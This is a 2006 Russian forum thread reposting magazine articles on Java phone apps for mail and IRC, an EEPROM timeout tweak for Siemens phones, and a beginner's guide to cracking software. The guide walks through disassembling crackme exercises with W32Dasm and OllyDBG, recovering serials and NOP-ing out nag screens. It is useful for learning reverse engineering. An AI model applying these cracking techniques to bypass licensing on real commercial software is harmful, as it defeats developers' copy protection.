Настроив учетные записи и выбрав активную, можешь возвращаться в главное меню и попробовать скачать почту ("Входящие"-"Опции"-"Подключиться"). Надеюсь, она у тебя скачивается. Полученные мессаги мидлет показывает частями - переход к каждой следующей части по кнопке "Дальше". Большой плюс программы в том, что она понимает сообщения в HTML - никаких "рюшечек", конечно, не будет, но текст письма ты прочитать сможешь.

В "Опциях" имеются фичи выбора кодировки, просмотр свойств мессаги (адрес и имя отправителя, тема письма...) и экспорт ее в eml-файл. Кстати, присоединенные файлы тоже можно сохранить на диск телефона. Впрочем, полноценному использованию этой возможности мешает одно из основных ограничений мидлета: письма больше 16 Кб он скачивать не может. Но, если задуматься, оно и не нужно - сейчас только спам больше 16 Кб весит.

Довольно хитро устроена манипуляция письмами. По командам "Удалить" и "Удалить все" мессаги только помечаются на удаление, а при следующем соединении с серваком удаляются оттуда и из базы MailMan'а. Если ты хочешь оставить копию на сервере, то выбери "Удалить запись" - тогда письмо исчезнет только из мобильника, но во время следующего коннекта скачается заново: это, на мой взгляд, тоже большой недостаток мидлета, который, надеюсь, автор устранит.





Автор: Metallica Dec 9 2006, 14:02

Еще в программку встроена простенькая адресная книга, не представляющая собой ничего особенного (всего два поля - имя и электронный адрес), но позволяющая сэкономить время при написании писем. Данный процесс не сложнее получения почты: иди в соответствующий пункт главного меню или выбери "Ответить" в контекстном меню при просмотре сообщения. Излив все свои сокровенные мысли на виртуальную бумагу, ты можешь по команде "Отправить позже" поставить мессагу в очередь на отправку при следующем коннекте, или, воспользовавшись командой "Сохранить", просто записать ее в папку "Исходящие". Вообще, с вводом текста связано еще одно ограничение, на этот раз даже не столько MailMan'а, сколько самой мобильной Явы: максимальный размер поля для ввода (а значит, и всей мессаги) - 512 символов. Се ля ви, как говорят эскимосы!

Кстати, размер оперативки и места на диске для почты программа показывает в пункте главного меню "Разное". Оттуда же рекомендую иногда проводить "дефрагментацию", иначе место будет постепенно забиваться мусором...

В принципе, если Java-профили настроены правильно, то, как и в случае с uMessenger, большинство ошибок при использовании программы будут связаны с нехваткой памяти. В этом случае надо в обязательном порядке удалять лишние мессаги. Или же неправильно прописаны параметры серверов: запомни, что если программа выдает ошибку 201 - значит, она по какой-то причине не может подключиться к POP3-серверу, а если ошибку 110 - то, соответственно, к SMTP-серверу.

В общем и целом, несмотря на ряд недостатков (а у кого их нет?) MailMan на сегодняшний день - это единственная программа, которая позволяет без особых проблем полноценно работать на мобильнике с русскоязычной почтой. Рекомендуется всем, кому на мыло помимо спама приходят и реально нужные письма.

<Ирка дает каждому>

Web-чаты, форумы всякие - это, конечно, хорошо, но, на мой взгляд, IRC до сих пор является лучшим средством для общения по какой-либо конкретной теме: и быстро, и удобно, и достаточно надежно. Опять же - сервис стандартный и поддерживается везде, где есть хоть какая-то лазейка в Сеть. Теперь и телефон будет на подхвате.

На сегодняшний день лучшим мидлетом для работы с IRC является, без сомнения, Virca.

Virca 1.1.3 by Vidar Holen

Тип: Siemens J2ME

Размер: 27 Кб

Лицензия: Freeware

Сайт: www.vidarholen.net/contents/virca

Я не буду вдаваться в принципы работы самого IRC - это и так все знают. Лучше скачаем этот мидлет и посмотрим, что умеет делать конкретно он.

Первый бонус виден сразу же после запуска - Virca поддерживает сколько угодно серверов и каналов - не то что в других подобных мидлетах. Создаешь сколько угодно профилей, соответствующих разным серверам и каналам, а потом просто выбираешь нужный.

Но с профилями мы сейчас разберемся, а пока сходи в "Options"-"Globals" и впиши туда свое имя - инфа из этого окна будет передаваться другим юзерам по запросу whois.Теперь в главном окне выбери в нижнем списке "Create new" и дави на "Options"-"Ok". С первым окном все ясно - там нужно ввести название будущего профиля, а вот второе интереснее. Первая строка - адрес сервера. Можно, например, соединяться с отечественным DALnet'ом (www.dal.net.ru) и использовать любой его сервак - скажем, lan.dal.net.ru:6667 (с этого порта сервер "говорит" в кодировке cp1251, а с 668 - в Koi8). В следующем поле вводи через запятую названия нужных тебе каналов - допустим, "#o45m.ru" или "#ixbt". Дальше все очевидно - ник, пароль (на бесплатных серверах, типа DALnet'а, он, конечно, не нужен), размер и цвет шрифта (тут уж как тебе удобнее), кодировку для русского языка (обычно cp1251). Параметр "Phone input" можешь оставлять в "None" - программа хоть и показывает русские буквы, но отправлять русский текст пока не умеет. Автор пообещал мне в мыле, что сделает это примерно через месяц, так что думаю, к тому времени, когда ты это будешь читать, уже выйдет новая версия с полноценной поддержкой русского. Последний параметр профиля "Sync I/O" оставь в положении "None", и только если заметишь, что Virca тормозит с отправкой мессаг - тогда имеет смысл поиграться и поставить "Quick poll".

Создав профиль, с чистой совестью выбирай его в главном окне, ставь снизу флажок "Use" и дави на "ОК". Заранее предупреждаю: коннектится к серваку мидлет долго. Не потому, что тормозной, а потому что это процесс длительный.

Уже теперь можешь чатиться в свое удовольствие: после соединения с серваком для каждого канала (и для сообщений самого сервера) откроется отдельное окно, где и станут появляться сообщения юзеров. К сожалению, единого списка пользователей каждого канала нет, и поэтому перед каждой репликой пишется имя ее автора, а общий список показывается лишь один раз - при входе на канал. Пролистывание чата осуществляется стрелками вверх-вниз или цифрами 2-8, а переход между окнами, соответственно, влево-вправо (на телефонах, где эти кнопки присутствуют) или 4-6.

Заголовок активного окна выделяется цветом. Кроме того, если в неактивное окно поступит новое сообщение, то мидлет сигнализирует и об этом.

Свои реплики можешь вводить в "Options"-"Input": это могут быть обычные мессаги, мессаги, эквивалентные команде "/me" в IRC-клиентах (если кто не помнит - это когда в начале фразы автоматически подставляется имя ее написавшего), а также команды серверу.

Поддерживаемых команд не так уж много, но, например, послать кому-нибудь приватное сообщение, сменить свой ник или подключиться к другому каналу ты сможешь (полный список доступных команд лежит на сайте программы).

Есть в Virca очень полезная фенечка, которой часто не хватает в uMessenger - шаблоны сообщений. Лениво же каждый раз набирать на телефонной клавиатуре "Хай!" - лучше уж выбрать эту великую фразу из менюшки. Так вот, менюшка эта в Virca называется "Favorites" - в нее ты как раз и можешь добавлять ("Options"-"Add") шаблоны сообщений для быстрой посылки их в чат (отметить нужную фразу галочкой и нажать "Options"-"Send"). У "Favorites" имеется еще одна приятная возможность - если добавить перед текстом сообщения слеш "/", то эта мессага станет автоматически отсылаться после каждого соединения с этим сервером. Нужно это, прежде всего, для того, чтобы на том же DALnet'е авторизироваться при входе на сервер - делаешь шаблон типа "/msg NickServ identify <твой_пароль>" и всегда входишь под своим зарегистрированным ником без всяких проблем.

Ненужные окна можно закрывать, а чтобы переподключиться на другой сервер, безопаснее всего выйти из мидлета и войти заново.

Как бы то ни было, а Virca, на мой взгляд, - это лучшее средство для чата по IRC с телефона. А если автор сделает еще и поддержку ввода на русском языке - то альтернативы просто не будет.

<Reallife - ничто, интернет - все>

Ну вот, теперь ты знаешь в деталях, как использовать твой телефон с Явой и GPRS, чтобы он стал полноценным "коммуникационным центром". Пусть друзья спрашивают, как ты умудряешься без выделенки круглосуточно сидеть в аське и почему в любое время суток почту ты читаешь через минуту после того, как ее тебе послали. Воистину, быть вечно on-line - это то, к чему стремится душа каждого закоренелого компьютерщика. Так что пусть базовые станции всегда будут рядом, GSM-сигнал - сильным, а сеть выдает не меньше 4х таймслотов GPRS. Успехов!

Ссылки по теме

1) Все мидлеты, как всегда, лежат вот тут:

www.siemens-club.ru/soft-java-c55.php

2) В данном разделе форума обсуждаются, в частности, и описанные в этой статье мидлеты:

http://forum.siemens-club.ru/viewboard.php?BoardID=11

Опять о настройке HTTP-профилей

В апрельском номере я уже говорил об этом, но повторю еще раз: правильно настраивай профили Java для соединения с Сетью!

Во-первых, без поддержки GPRS я бы не рекомендовал тебе вообще заморачиваться с аськой, почтой и прочими делами - представь, сколько ты насидишь в инете денег через CSD-соединение. Во-вторых, помни, что в качестве параметров для доступа ("Настройки"-"Передача данных" и далее по обстоятельствам - "HTTP-профили", "Java-профили" или подобное - на разных моделях называется по-разному) необходимо использовать именно интернет-GPRS, а не Wap-GPRS. Поэтому, кстати, многочисленные абоненты Би+ в Москве обламываются - им недоступна такая услуга.

Если что-то с чем-то не соединяется, то помимо настроек самих мидлетов, первым делом следует проверить, отключен ли proxy в телефоне, правильно ли указаны параметры учетных записей оператора - DNS, APN для GPRS и прочие.

Как продлить наслаждение

Максимальный таймаут на интернет-соединение в Siemens M50 и C55 ("Параметры HTTP"-"Врем.разъед." в любом из профилей) всего 999 секунд - больше ввести не получится. Однако этого времени (примерно 16 минут) зачастую не хватает: аська должна работать постоянно, независимо от того, шлешь ты мессаги или нет - вдруг придет что-то важное? Было бы неплохо значение этого параметра увеличить, чем мы сейчас и займемся.


Прежде всего достань программу Siemens EEPROM tools. Основные принципы работы с ней были освещены в майском номере ][ в статье "Дело труба", а сейчас я просто опишу нужный порядок действий, отступать от которого - смерти подобно (для твоего телефона).

1) Запускай программу, выбирай ком-порт, к которому подключена выключенная мобила, дави "Init" и коротко жми на кнопку с красной трубкой - в общем, все как при перепрошивке и аналогичных действиях, подробности в майском номере.

2) О том, что программа "схватилась" с телефоном, свидетельствует разблокировка всех кнопок в правой части и выведенная в рамке информация о мобиле.

3) Жми на кнопку "Load all" в правой части окна. Внизу побежит прогресс-бар... Дождись, пока добежит до конца.

4) В появившемся списке выдели курсором один блок - в зависимости от того, какой профиль ты хочешь изменить (5237 - профиль 1, 5238 - профиль 2, и так далее до профиля с номером 5) и нажми большую кнопку со стрелкой, указывающей влево - блок перенесется в левый список.

5) Сохрани его в формате bin, а получившийся файл открой в любом hex-редакторе.

6) По смещению 16 (то есть Fh) замени два байта с текущим значением таймаута (для 999 сек это E703h, для 300 сек - 2С01h) на FFFFh, что даст нам соответственно 65535 секунд беспрерывной работы. Сохрани файл и возвращайся в EEPROM tools.

7) Загрузи измененный bin-файл в левую половину окна, после чего перенеси полученный блок в правую часть соответствующей кнопкой со стрелкой.

8) Выдели курсором этот блок в правом списке и нажми кнопку "Save selected" (ни в коем случае не нажимай на "Save all"!).

9) Все готово! Выходи из программы и включай мобилу!

Помни, что все это ты делаешь исключительно на свой страх и риск. Если ты не уверен в прямоте своих рук, то лучше и не пробуй.

Слепой двухпальцевый метод

Я не буду учить тебя вводить текст - опыта в этом деле ты уже набрался, пытаясь со сверхкосмической скоростью строчить SMS'ки друзьям/подругам/любовникам/любовницам (нужное подчеркнуть). Лучше поговорим о вводе текста в мидлетах.

Во-первых, тут лучше всего писать по-русски - мало кто будет ловить кайф, общаясь по аське транслитом или разбирая мессаги, типа "B4epa bylo o4eHb kleBo, tolko *apko"... Так что выбирай из меню (нажми и удержи в текстовом поле "звездочку") русский язык (который сейчас поддерживает каждый современный аппарат, а если не поддерживает, значит просто надо обновить ему прошивку - об этом было в майском номере ][) и начинай бороздить его просторы.

Просторы эти лучше всего бороздить с использованием технологии Т9, которая тоже есть во всех новых трубках. Для тех, кто в танке, поясняю: активировав ее нажатием на "решетку" (в верхнем левом углу должен появится соответствующий значок), тебе больше не придется выбирать одну букву из нескольких, которые висят на кнопке - просто нажимай на эту кнопку один раз. По мере ввода телефон сам угадывает, какую букву надо вставить, и в итоге ты получаешь именно то, что тебе было нужно. Ошибки бывают только в коротких словах (из двух букв) и в окончаниях (например, в глаголах - "делаю"-"делая") - тогда надо правой функционалкой выбрать нужный вариант. Очень редкие слова телефон не знает, и их надо вводить вручную. Вообще, хоть некоторые и не любят Т9, но у лично у меня с ним скорость ввода - как на компьютерной клавиатуре (если нажимать на ее клавиши одним пальцем). Главное - не делать орфографических ошибок. Кстати, разные жаргонные слова и полное собрание русского мата в базе данных Т9 тоже присутствуют.

Сложнее тебе придется, если на клавиатуре твоего мобильника нет русских букв (а таких, по-моему, большинство). Совет один: запоминай русскую раскладку раз и навсегда. Для этого надо не так много умственной энергии (всего 8 клавиш: 2 - абвг, 3 - дежз, 4 - ийкл, 5 - мно, 6 - прс, 7 - туфх, 8 - цчшщъ, 9 - ыьэюя), зато после этого печатать будешь со скоростью машинистки: что с Т9, что без него. А для зазубривания расположения русских букв есть два народных средства. Во-первых, опытные мобильщики советуют перенабить с английского на русский всю свою телефонную книжку прямо на трубке - дельный совет, учитывая, что она действительно обычно на английском и имеет немаленький размер. Во-вторых, для лучшего усваивания знаний можно повесить на экран телефона в качестве заставки оператора картинку с русской раскладкой - такая фишка лежит, например, на www.o45m.ru в разделе "Файлы"-"Логотипы".

Уверен, что после усиленного тренинга ты сможешь набить Большую Советскую Энциклопедию на телефоне в течение нескольких часов.



Автор: Metallica Dec 9 2006, 15:23

Крякинг — это просто

Первые шаги для начинающего крэкера

По какой-то непонятной мне причине многие считают, что взломом программ занимаются исключительно компьютерные гуру, которые до мозга костей прониклись низкоуровневым кодингом и прикладной криптографией. Но как только ткнешь их носом, покажешь отладчик, разжуешь все и разложишь по полочкам — удивляются: «Неужели все так просто, а?». Твоя очередь!

[reversing]

Начнем с самого простого. Что вообще нужно для того, чтобы взломать программу, обойти или убрать защиту, сгенерировать серийный код? Правильно — посмотреть исходный код программы и при необходимости видоизменить его. К сожалению, найти исходник к коммерческому продукту практически невозможно, поэтому приходится идти по обходному пути.

Как известно, любая программа (вернее сказать, исполняемый файл) представлена на компьютере в виде машинных команд. Эти команды понятны микропроцессору, но программировать с их помощью чрезвычайно сложно: открой любой EXE-файл в HEX-редакторе, и ты сразу поймешь, что я имею в виду. Чтобы облегчить процесс программирования был изобретен специальный транслятор, который имеет примитивный набор команда и способен преобразовывать составленные из них конструкции в машинный код. Имя этого чудного изобретения — ассемблер.

Понимаешь, куда я клоню? Если из ассемблерного листинга можно получить машинный код, то вполне возможно и обратная операция. Действительно любой исполняемый файл с той или иной точностью может быть представлен в виде ассемблерных команд — этой задачей, собственно, и занимаются дизассемблеры. Наиболее продвинутым дизассемблером по праву считается IDA (www.idapro.ru), однако, для его использования требуется некоторый опыт. Для решения несложных и средних задач вполне достаточно менее функционального, но удобного — W32Dasm (www.expage.com/page/w32dasm).

Помимо дизассемблера нам потребуется еще и отладчик (дебаггер). Он также дизассемблирует исходный код программы (т.е. включает в себя функции дизассемблера), но помимо этого позволяет еще и пошагово, инструкцию за инструкцией, выполнить программу. Ты полностью контролируешь ход ее выполнения, при этом текущие ассемблерные команды всегда находятся у тебя перед глазами. Долгое время абсолютным лидером среди отладчиков был SoftIce, сейчас же многие начали использовать OllyDBG (www.ollydbg.de). Это 32-битный низкоуровневый отладчик с продуманным интерфейсом и полезными функциями, которые существенным образом облегчают процесс отладки. В OllyDBG встроен специальный анализатор, который распознает и визуально обозначает процедуры, циклы, константы и строки, внедренные в код, обращение к функциям API, параметры этих функции и т.п. Для новичка (и не только) — это именно то, что надо!

[с чего начать?]

Начиная заниматься крэкингом, будь рассудителен. Мой тебе совет: не спеши брать быка за рога и сразу браться за взлом добротной софтины с продуманной защитой. Без соответствующего опыта у тебя все равно вряд ли что-то получишься. Скорее всего, ты просто закинешь это неблагодарное занятие, одновременно с этим потеряв всякий интерес к теме. Начинать, как известно, надо с простого: здесь будет и понимание, и интерес, и самое главное – толк. Можно, например, зайти на www.downloads.com и накачать пару десятков сомнительных программ, типа СуперЗвонилки, ГиперБлокнота и т.д. — среди них, наверняка, найдутся экземпляры с примитивной защитой. Но я тебе рекомендую начать с так называемых крякмисов (crackme) — специальных заданий для взломщиков. Многие из них написаны специально для новичков, о чем указано описании, поэтому идеально подойдут для обучения. Вдобавок многие репозитарии крякмисов (например, www.crackmes.de) выкладывают еще и туториалы (инструкции по прохождению), поэтому ты сможешь сравнить свой и авторский подходы взлома или же найти подсказку на пути к верному решению. Идеальный вариант для новичков — серия крякмисов от FaNt0m’а (www.crackmes.de/users/fant0m/fant0mcollection). Ее и рассмотрим: для лучшего усвоения рекомендую выполнять действия параллельно со мной. Только в этом случае ты будешь понимать, о чем я говорю smile.gif.

Возьмем первый крякмис из коллекции — FaNt0m's CrackMe #1. В задании требуется найти серийник, при этом используя исключительно дизассемблер. Использовать дебаггер по условию запрещено, но он, собственно и не требуется. Посмотрим, что собой представляет программа: обычное окно с текстовым полем для ввода. После ввода случайного значения (например, слова «хакер»), появляется всплывающее окно с ошибкой «Wrong password. Keep trying, you’ll get it!». От этого, собственно, мы и будем крутиться. Текстовые строки информационных сообщений зачастую хранятся в самом коде программы. Соответственно, если найти обращение к строке, то без труда найдется и вызов функции вывода сообщения, а там уже и процедура проверки серийника недалеко. Попробуем разобраться во всем более подробно.

В общем случае программа состоит из трех областей памяти (сегментов): сегмента кода (CS), сегмента данных (DS) и сегмента стека (SS). В первом, как ты понял, хранится непосредственно код программы, т.е. команды и командные инструкции. Второй сегмент предназначен для хранения данных (переменных, констант и т.д.) — по идее, выданное программой сообщение располагается именно там. Сегмент стека представляет собой специальную область памяти, предназначенную для временного хранения данных: например, параметров, передаваемых процедурам и функциям. Слово «стек» подразумевает использование принципа FILO (First In – Last Out, «первым пришел — последним вышел»). Последнее занесенное в стек (командой PUSH) значение, будет извлечено (командой POP) первым, предпоследнее — вторым и т.д. Можно наглядно представить себе это, вообразив колоду карт.

Если ты знаком с программированием под Windows, то должен знать, что стандартное окно с сообщением чаще всего выводится с помощью специальной API-функции MessageBoxA. Сама строка сообщения и прочие параметры окна помещаются в стек, откуда позже извлекаются и обрабатываются функцией (это самый распространенный способ передачи параметров функции в языке ассемблер). Получается, что после ввода неправильного (ты же не думаешь его угадать, верно?) серийника, программа загружает в стек адрес строки и вызывает функцию MessageBoxA. W32Dasm, как и многие другие дизассемблеры, умеет показывать, где именно происходит обращение к той или иной строке. Это значительно облегчает поиск нужного фрагмента кода: достаточно в дизассемблированном листинге произвести поиск текста сообщения, и мы сразу найдем нужный вызов функции MessageBoxA. В большинстве случаев где-нибудь рядом располагается и процедура проверки серийника. Наша задача — с помощью дизассемблера посмотреть правильный пароль во время сравнения его со введенным.




Автор: Metallica Dec 9 2006, 19:52

[взлом серийника]

Запускай W32Dasm, далее меню Dissembler –> Open File и выбирай файл CRACKME1.EXE. Ву-а-ля! Перед тобой полностью дизассемблированный код программы, но и в нем еще нужно разобраться. Наша цель — найти ту часть кода, которая каким-то образом использует обозначенную выше строку. Самый банальный способ — провести поиск строки (меню Search -> Find Next), но есть и другой вариант. Дело в том, что W32Dasm записывает все найденные обращения к строковым данным в специальный список (меню Refs -> String Data References). Поэтому вместо поиска можно просто выбрать из списка нужную строку и дважды кликнуть по ней мышью. Так или иначе, W32Dasm автоматически переведет тебя на следующий код:

* Possible StringData Ref from Data Obj ->"Wrong Password! Keep trying, you'll get it!"

004012A2 6845304000 push 00403045

Комментарий указывает на то, что в следующей команде происходит обращение к нужной строке — «Wrong password. Keep trying, you’ll get it!». Разберем эту команду более подробно: 004012A2 — это адрес, по которому в памяти находится данная команда, 6814654100 — представление команды в шестнадцатеричном виде (машинные коды), push 00403045 — непосредственно сама ассемблерная команда. Она помещает в стек адрес 00403045, по которому, судя по комментарию W32Dasm’а, хранится наша строка.

По нашему предположению после загрузки адреса строки в стек, происходит вызов функции, выводящей сообщение на экран. Так и есть — смотрим ниже:

* Reference To: USER32.MessageBoxA, Ord:01BBh

:004012A9 E85C000000 Call 0040130A

W32Dasm нам явно указывает, что команда вызова функции Call вызывает именно API-функцию вывода окошка (MessageBoxA). Теперь смотрим, что происходило до вызова это функции. Сразу бросается в глаза следующий код:

00401291 Call 00401352

00401296 cmp eax, 00000000

00401299 je 004012B0

«Да вот прямо он мне так в глаза и бросился — по-моему, ничем не отличается от всего остального», — возможно, грустно подметишь ты.

На самом деле это довольно стандартная конструкция — запомни ее. В 90% случаев это и есть код проверки серийника. Сначала вызывается некоторая процедура, которая сравнивает введенный пользователем и правильный код и по результатам проверки устанавливает нужное значение регистра EAX. После этого с помощью команды CMP производиться сравнение значение регистра с 0. Если они равны (je – jump equal – перейти, если равно), осуществляется переход на адрес 004012B0. Давай посмотрим, что находится по этому адресу — нажми Shift+F12 и в появившемся окошке введи этот адрес. Ого! Появившийся фрагмент кода в точности повторяет код вывода сообщения на экран. Разница лишь в том, что вместо сообщения о неправильном коде, выводится надпись «You got it! Your now a cracker!». Отсюда вывод: вызванная ранее процедура действительно осуществляет проверку серийных кодов. Если пользователь ввел правильный пароль, то значение регистра EAX становится равным 0, и управление передается процедуре вывода сообщения об успехе. В противном случае в регистр EAX записывается 1, и никакого перехода не происходит. Далее по коду расположен вызов MessageBoxA с сообщением об ошибке, который и выполняется.
В нашем случае все еще проще. Функция проверки является стандартной функцией сравнения двух строк lstrcompareA, которой через стек передаются два параметра:

:00401287 689C304000 push 0040309C

* Possible StringData Ref from Data Obj ->"m0tNaF-EmKCARc"

:0040128C 6829304000 push 00403029

* Reference To: KERNEL32.lstrcmpA, Ord:02D6h

00401291 E8BC000000 Call 00401352

Первой командой push в стек заносится адрес веденной нами строки, а второй — настоящий серийник. W32Dasm любезно подсказал, что по этому адресу находится строка «m0tNaF-EmKCARc». Это и есть серийник smile.gif.

[убираем наги]

Наг — это назойливое окошко, которое присуще любой триальной программе. Смысл окошка — напомнить пользователю о том, что программисты тоже любят кушать, поэтому покупка программы была бы очень кстати. Общий принцип таков. Во время запуска приложения, осуществляется простая проверка — зарегистрирована ли программа или нет. Индикацией того, что приложение зарегистрировано, может быть наличие некоторого файла, ключа реестра или, что более вероятно, определенное их содержание. Если в результате проверки окажется, что прога уже зарегистрирована, то никакого наг-окна не выводится, и программа продолжает обычную работу. В противном случае управление передается процедуре, которая выводит наг на экран и в большинстве случаев требует нажатия клавиши для продолжения работы.

Как правило, убрать наг-окно не представляет труда, в этом легко убедиться на примере FaNt0m's CrackMe #2. После запуска проги пользователя одаривают не одним, а сразу двумя наг-окошками, но задача от этого практически не усложняется. К сожалению, возможность регистрации не предусмотрена, поэтому единственное, что остается сделать, — это вручную убрать из кода «лишние» фрагменты программы. Или точнее говоря, вызовы процедур, выводящих на экран эти назойливые сообщения. В принципе это можно сделать с помощью дизассемблера и HEX-редактора, но удобнее и уместнее все-таки использовать отладчик (или и то, и другое одновременно) — скоро ты в этом убедишься.

Итак, запускай OllyDBG и с помощью меню открой файл CRACKME2.EXE. В принципе найти нужный фрагмент кода, содержащий вызовы «лишних» процедур, можно по описанному ранее алгоритму. Для этого нужно кликнуть правой мыши в окне с ассемблерным кодом и в контекстном меню выбрать пункт Search for -> All referenced text strings. В появившемся списке ты сразу же увидишь текст сообщения, выводимый в окне нага, а двойным кликом — сможешь перейти туда, где он используется. Но мы пойдем по другому пути и изучим еще один ключевой прием, который активно используется во время взлома программ.

Если ты уже когда-то пробовал ломать программы, то наверняка слышал о так называемых брейкпоинтах (breakpoints). Брейкпоинт — это место останова программы, т.е. точка, в которой программа приостанавливает свое выполнение и указывает адрес текущей команды в отладчике. Использовать этот чрезвычайно полезный прием очень просто. Нам уже известно, что небольшое окошко с сообщением легко может быть выведено на экран с помощью функции MessageBoxA. Теперь все, что от нас требуется — установить точку останова на вызов этой функции, а после остановки программы всего лишь «вырезать» из кода ее вызов. Попробуем?

Если ты правильно установил OllyDBG и подключил чрезвычайно полезный плагин CommandBar, то в нижней части экрана должно светиться окно для ввода команды.

Введем команду для установки точки останова на вызове функции MessageBoxA: bpx MessageBoxA. Правильность установки брейкпоинта можно проверить в окне Breakpoints (меню View -> Breakpoints). Там же его можно на время деактивировать, или вовсе удалить. Далее необходимо запустить программу из отладчика — для этого нажми клавишу F9 или выбери в меню Debug -> Run.

Программа сразу же остановилась на команде с адресом 004010DE:

004010DE CALL <JMP.&USER32.MessageBoxA> ; \MessageBoxA

Мы получили то, что хотели — программа остановилась до вызова функции MessageBoxA. Если ты выполняешь действия параллельно со мной, то наверняка приятно удивлен, что OllyDBG приводит расшифровку параметров, которые передаются этой процедуре. Очень наглядно и удобно.

[нет операции]

Теперь разберемся, как этот вызов можно убрать. В этом нам поможет специальная инструкция ассемблера — «нет операции» (NOP). Для того, чтобы убрать вызов процедуры (или любой другой код), достаточно забить его машинный код командами NOP. В результате в программе образуется своеобразная «дырка», но на работоспособность она ни коем образом не повлияет. Правда, здесь есть один нюанс. Машинный эквивалент команды NOP (в шестнадцатеричном представлении — 90) занимает один байт, в тоже время машинная команда, вызывающая функцию MessageBoxA (E8 C5010000), — целых 5. Несоответствия быть не должно, и чтобы полностью перекрыть исходную команду нужно использовать команду NOP 5 раз. К счастью, OllyDBG полностью избавляет нас от лишнего геморроя. Кликни правой кнопкой мыши на строке, где произошла точка останова, и выбери в меню Binary -> Fill with NOPs. Отладчик самостоятельно заполнит команду NOP’ами нужное число раз. Теперь можно продолжить выполнение программы — нажимаем F9. Сразу выясняется две новости: одна хорошая, другая — нет. Начну с хорошей: первый наг-скрин мы убрали. Плохая новость заключается в том, что другой наг остался на месте. Почему? Видимо, он отображается с помощью другой API-функцией, на которую брейкпоинт не установлен. Не беда. Открываем окно References (View -> References): после установки первого брейкпоинта сюда записался список всех вызываемых программой функций. С базовыми знаниями API (или мануалом под рукой) можно предположить, что второй наг выводится с помощью функции DialogBoxParamA. Предлагаю проверить тебе это самому.

Все изменения можно вручную внести через HEX-редактор, с помощью которого байты по нужным адресам перезаписать числом 90. Или же автоматически записать все изменения с помощью самого OllyDBG: правый клик по исправленному ассемблерному коду, меню Copy to Executable -> All modifications.

[защита: имя-серийник]

Доселе мы рассматривали самую примитивную защиту. FaNt0m's CrackMe #4 представляет собой более сложную задачу. Требуется найти не просто серийник, а регистрационный номер, который зависит от введенного имени пользователя. Другими словами, он генерируется по определенному алгоритму. Такой подход используется в большинстве программ, поэтому особенно актуально будет рассмотреть именно его. Вначале схема стандартна: открываем программу в OllyDBG, устанавливаем бряку на MessageBoxA и запускаем программу клавишей F9. После ввода полей (например, step/123) нажимаем на кнопку Check и попадаем в отладчик. Перед нами уже знакомый код вывода сообщения на экран с текстом «Wrong Serial! Keep trying, you'll get it!». Непорядок! Посмотрим, что было чуть ранее: сначала идет код вывода сообщения об успешной регистрации, а еще выше — инструкция, похожая на вызов процедуры проверки регистрационного номера. Если ты внимательно читал статью с самого начала, то она должна быть тебе уже знакома:

00401236 CALL CRACKME4.004012F9

0040123B CMP EAX,0

0040123E JE SHORT CRACKME4.00401255

По логике вещей в процедуру проверки (а также генерации) регистрационного ключа должны передаваться параметры. Как минимум: введенные пользователем имя пользователя и ключ. Так и есть:

00401205 PUSH

0040120A PUSH CRACKME4.00403084 ;адрес буфера

0040120F PUSH 3E8

00401214 PUSH DWORD PTR SS:[EBP+8]

00401217 CALL <JMP.&USER32.GetDlgItemTextA> ;GetDlgItemTextA

0040121C PUSH 100

00401221 PUSH CRACKME4.00403184 ;адрес буфера

00401226 PUSH 3E9

0040122B PUSH DWORD PTR SS:[EBP+8]

0040122E CALL <JMP.&USER32.GetDlgItemTextA> ;GetDlgItemTextA

Вызванная дважды API-функция GetDlgItemTextA извлекает значения текстовых полей и помещает их значения в буферы, адреса которых передаются в функции в виде параметров. Далее будем действовать по вполне стандартной схеме: поставим брейкпоинт на GetDlgItemText. Программа в этом случае будет остановлена еще ДО генерации и проверки регистрационного кода. А значит, мы сможем проследить за этим процессом и подсмотреть правильно сгенерированный номер с помощью отладчика.

Перезапускаем программу (для этого удобно использовать горячую клавишу — Ctrl+F2), далее с помощью окна Breakpoints удаляем поставленные ранее бряки на MessageBoxA и устанавливаем новую точку останова на GetDlgItemTextA (bpx GetDlgItemTextA). Теперь запускаем (клавиша — F9) и вводим в текстовые поля произвольные значения. Программа остановится на первом вызове этой функции:



Автор: Metallica Dec 9 2006, 22:54

00401217 CALL <JMP.&USER32.GetDlgItemTextA> ;GetDlgItemTextA

Отсюда начинаем выполнять программу пошагово. Для этого в OllyDBG предусмотрены два варианта: трассировать с заходом в подпрограммы (клавиша — F7) или трассировать без захода в подпрограммы (F8). Курсор сейчас установлен на вызове API-функции. Нас совершенно не интересует алгоритм ее работы, поэтому трассируем команду без захода в подпрограмму. Значительно интереснее ее результат. Как уже было сказано, GetDlgItemTextA заносит в буфер строковое значение, которое пользователь ввел в текстовом поле. Это легко проверить. В параметрах процедуре передается адрес начала буфера — 00403084. Давай посмотрим, что было размещено в нем после выполнения команды. Для этого нажми правой кнопкой мыши по нижней части окна CPU, где расположен дамп данных, и в появившемся меню выбери Go to -> Expression. После ввода нужного адреса, программа высветит данные, которые расположены по этому адресу. У меня это строка — «step».

Двигаемся далее. Аналогичным образом трассируем программу вплоть до вызова процедуры CRACKME4.004012F9. Поскольку она, скорее всего, и выполняет генерацию серийника, трассируем эту команду с заходом в процедуру. Первые 2 десятка команд описывают алгоритм, по которому производится генерация серийника. Это очень простой алгоритм, но привести его код здесь не смог — рискую гонораром. Зато я полностью откомментировал его и выложил с исходником кейгена на диск.

Сейчас нас интересует другое — сравнение сгенерированного и введенного нами серийника. Трассируем программу до следующего кода:

00401334 PUSH CRACKME4.00403284 ; String2 = "LMXI"

00401339 PUSH CRACKME4.00403184 ; String1 = "sa"

0040133E CALL <JMP.&KERNEL32.lstrcmpA> ; lstrcompareA

Оказалось, что в результате работы алгоритма, сгенерированный серийник был записан по адресу 00403284. Теперь с помощью уже знакомой функции lstrcmpA производится сравнение его значения с серийником, который ввел пользователь. Чтобы не заставлять пользователя вручную просматривать значение, расположенное по адресу 00403284, OllyDBG любезно вывел его справа в комментариях. «LMXI» — это и есть правильный регистрационный номер для имени «step». Можешь это проверить smile.gif.

[это не конец]

Естественно мы рассмотрели самые примитивные типы защит. Однако даже этих основ порой достаточно, чтобы взломать плохо защищенные программы. Надеюсь, ты убедился, что для этого совершенно не обязательно идеально владеть ассемблером. В большинстве случаев вполне достаточно знания азов и работающих извилин в голове. Если тебе интересна тема взлома программ — пиши. И мы обязательно расскажем тебе о том, как взломать более сложные защиты и упакованные программы, как обойти антиотладочные приемы программистов и многое другое.


WWW

www.cracklab.ru — ведущий ресурс по взлому программ в России. Рекомендую.

www.crackmes.de — огромное количество всевозможных crackmes.

www.kalashnikoff.ru — для тех, кто хочет выучить азы ассемблера.

WARNING

